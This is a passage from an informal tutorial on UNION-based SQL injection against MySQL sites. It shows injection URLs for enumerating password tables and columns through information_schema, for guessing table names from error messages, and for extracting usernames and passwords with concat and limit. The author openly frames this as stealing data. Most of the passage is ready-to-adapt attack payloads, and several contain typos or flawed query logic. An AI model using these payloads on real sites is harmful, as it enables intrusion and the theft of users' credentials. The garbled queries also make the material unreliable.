http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --

then record the column and table its in. Lets say the columns userpass and table members. Then we’d change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1

then record the info again then. Then we change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --

etc, until you run out of columns that are like pass.

Now say you didnt want to use limit. You could also use NOT IN(). For example, say you did

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%'


and you got the column user_password and table members. Now you wanted to see if there was an admins table with a column like pass. So you would add to the end

AND column_name NOT IN ('value'). This says choose the first row where the column "column_name" doesnt have this value. So if you wanted to get the next user column, you would do

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND column_name NOT IN ('user_password') --

or to be more safe, incase the admins table also has the column user_password, you could make it check for the table name like:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password') --

Then say you got the column password and table backup_members. This is only a backup table, so you want to keep on going until you get the admins table. then you would take the url from before and add a ,'backup_members' to the NOT IN ('user_password') like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

and then you would check the table name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE table_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

You would continue adding ,'table_name' until you finally got to the admins table (if there is one!)

Keep in mind magic quotes must be off for this. Again, you will found out how to bypass magic quotes in times like this later.

Now lets say the mysql version was only 4 and information_schema IS NOT present. So we would have to use another method to try to get the tables/columns of our interest. Basically, you would first look in the errors and see if it discloses the whole query or atleast the table and column (etc Mysql Error in 'userpass FROM users where id=1''), and the then resort to good old guessing. These two steps mainly revolve around luck and poor error message configuration.

So let me explain the error method first. Lets say you do this:

http://site.com/script.php?id=1'


and get the error:

MySQL Syntax Error in the query 'SELECT name FROM sb_news WHERE id = 1''

In the above example, the tables have a prefix (sb). Prefixes are usually present in each table if their in one and are very common in sites. Now that you know the prefix, you would guess sb_users, sb_members, sb_admins, sb_accounts, etc. You see that the column has no prefix, so after you get the table you would try username, password, user_password, user_pass, login, etc... If the error was

MySQL Syntax Error in the query 'SELECT name FROM news WHERE id = 1''

Then you would know the columns have no prefix and you wouldnt have to guess with the prefix. However errors like this are very uncommon. A more common error would be:

Mysql Error: Syntax error by '1' AND g_embedable=1 LIMIT 1' at line 1

This would show you the column name in the particular table. This would be useful because you can now assume either all the columns in the database have the g_ prefix, or you could somehow figure out why it has the prefix (for example, if it was a page of games, you could guess that g stood for games), then see how you can modify it for the users table (so if the table was users, it could be u_password, u_pass, u_username, u_user, u_login, etc). Of course, you would have to straight out guess the tables and if they had prefixes.

But once you have this info, how exactly do you check if the table/column exists? You would use a union all select that selected null (nothing) from the table youre guessing. For example:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null FROM table (remember to use the right number of columns)

Now if you get an error saying Mysql Error: Table 'table' Not found in script.php on line 7 or any error similar, you know the table doesnt exist.

Once you have guessed the table correctly, then you would have to guess the column. You would do this by changing a null to the column name you guessing and seeing if there was an error. For example:

http://site.com/script.php?id=1' UNION ALL SELCT null,null,password from users

If there is no error and the page loads, then you know the column is password. If there is an error saying invalid column, you have to keep guessing. Remember to use a column that does NOT cause a conversion error since the error may be misleading.

Now that you have the column and table you want to steal data from, well move on to the next step!:



Subsection 2.9 - Step 8)Get your data

This is the final part of this tutorial, and easy as hell!

So we have our table and column. Lets say the table is users and the two columns you got are username and password. So all we have to do to get the data from those columns is use a simple select query in our url and limit to sift through the rows! So with username and password in table users, we would do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,username FROM users --

Then check the page where the data is displayed and youll see the username!

Now for the password:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --

Then check the page where the username was and you’ll see the password! Now, instead of doing two separate queries for the username and password, there are two ways to get the data out at the same time.

The first is if two columns display data to the page. Say columns 2 and 3 displayed data in our UNION ALL SELECT null,null,null. So we would do

http://site.com/script.php?id=1' UNION ALL SELECT null,username,password FROM users --

Then you can look on the page for the username AND password. But they are on different parts of the page, arent they? To get them together, we can use the function concat(). Concat joins strings. the syntax is concat(string1,string2,etc). You can put in as many strings as you want separated by commas. You can either use column_names or actual strings enclosed by 's (magic quotes must be off). The benefit is the data is together and we only need one column that outputs.

So we can do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,password) FROM users --

But then there would be no distinction between the username and password. So we should add an --- between them. So we could do concat(username,'---',password). Again, magic quotes MUST be off for this to work. An example would be:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) --

Then you will see the username and password separated by ---'s on the page!

Now, what if you didn’t want the first users password? Then you would use limit as I discussed earlier. You would tell limit to start from the 2nd row (which is actually 1 for computers since 0 is the first) and to choose 1 row (limit 1,1). So you would do

http://site.com/script.php?id=1’ UNION ALL SEELCT null,null,concat(username, ‘---‘, password) limit 1,1 –

Then you would check the page again and in the place you saw the previous username and password you would see the second users in the same exact format. Now if you wanted the next user, you would change limit 1,1 to limit 2,1, then the next would be limit 3,1, etc etc until you have all the users you want!

readmore...